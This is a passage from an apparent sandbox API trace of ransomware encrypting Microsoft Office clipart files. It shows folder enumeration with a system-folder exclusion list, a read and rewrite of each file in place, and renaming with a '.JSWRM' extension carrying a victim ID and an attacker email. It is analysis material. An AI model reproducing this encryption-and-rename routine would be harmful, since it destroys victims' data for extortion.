[0079.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0079.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.751] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099161.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099161.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.752] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4cc8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099162.JPG", cAlternateFileName="")) returned 1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2=".") returned 1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2="..") returned 1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2="...") returned 1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2="windows") returned -1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2="recovery") returned -1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2="perflogs") returned -1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2="documents and settings") returned 1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2="system volume information") returned -1 [0079.752] lstrcmpiW (lpString1="J0099162.JPG", lpString2="msocache") returned -1 [0079.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0079.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099162.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099162.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099162.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0079.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0079.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099162.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099162.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099162.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0079.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0079.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099162.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.753] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19656) returned 1 [0079.753] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4cc0) returned 0x24d210 [0079.753] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4cc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4cc0, lpOverlapped=0x0) returned 1 [0079.755] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.755] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4cc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4cc0, lpOverlapped=0x0) returned 1 [0079.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.756] CloseHandle (hObject=0x314) returned 1 [0079.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0079.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0079.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0079.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0079.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0079.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0079.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.756] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099162.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099162.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0079.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0079.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0079.757] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5754, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099163.WMF", cAlternateFileName="")) returned 1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2=".") returned 1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2="..") returned 1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2="...") returned 1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2="windows") returned -1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2="recovery") returned -1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2="perflogs") returned -1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2="documents and settings") returned 1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2="system volume information") returned -1 [0079.757] lstrcmpiW (lpString1="J0099163.WMF", lpString2="msocache") returned -1 [0079.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099163.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099163.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099163.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099163.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099163.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099163.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099163.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.758] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22356) returned 1 [0079.758] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5750) returned 0x24d210 [0079.758] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5750, lpOverlapped=0x0) returned 1 [0079.761] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.761] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5750, lpOverlapped=0x0) returned 1 [0079.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.761] CloseHandle (hObject=0x314) returned 1 [0079.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0079.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0079.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0079.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0079.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0079.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.762] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099163.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099163.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0079.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.762] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x55ba, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099164.WMF", cAlternateFileName="")) returned 1 [0079.762] lstrcmpiW (lpString1="J0099164.WMF", lpString2=".") returned 1 [0079.763] lstrcmpiW (lpString1="J0099164.WMF", lpString2="..") returned 1 [0079.763] lstrcmpiW (lpString1="J0099164.WMF", lpString2="...") returned 1 [0079.763] lstrcmpiW (lpString1="J0099164.WMF", lpString2="windows") returned -1 [0079.763] lstrcmpiW (lpString1="J0099164.WMF", lpString2="recovery") returned -1 [0079.763] lstrcmpiW (lpString1="J0099164.WMF", lpString2="perflogs") returned -1 [0079.763] lstrcmpiW (lpString1="J0099164.WMF", lpString2="documents and settings") returned 1 [0079.763] lstrcmpiW (lpString1="J0099164.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.763] lstrcmpiW (lpString1="J0099164.WMF", lpString2="system volume information") returned -1 [0079.763] lstrcmpiW (lpString1="J0099164.WMF", lpString2="msocache") returned -1 [0079.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099164.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099164.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099164.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0079.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099164.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099164.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099164.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0079.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099164.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.763] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21946) returned 1 [0079.763] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x55b0) returned 0x24d210 [0079.764] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x55b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x55b0, lpOverlapped=0x0) returned 1 [0079.766] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.766] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x55b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x55b0, lpOverlapped=0x0) returned 1 [0079.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.767] CloseHandle (hObject=0x314) returned 1 [0079.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0079.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0079.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0079.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0079.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0079.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.767] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099164.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099164.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0079.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.768] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc53a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099165.JPG", cAlternateFileName="")) returned 1 [0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2=".") returned 1 [0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2="..") returned 1 [0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2="...") returned 1 [0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2="windows") returned -1 [0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2="recovery") returned -1 [0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2="perflogs") returned -1 [0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2="documents and settings") returned 1 [0079.768] lstrcmpiW (lpString1="J0099165.JPG", lpString2="$RECYCLE.BIN") returned 1 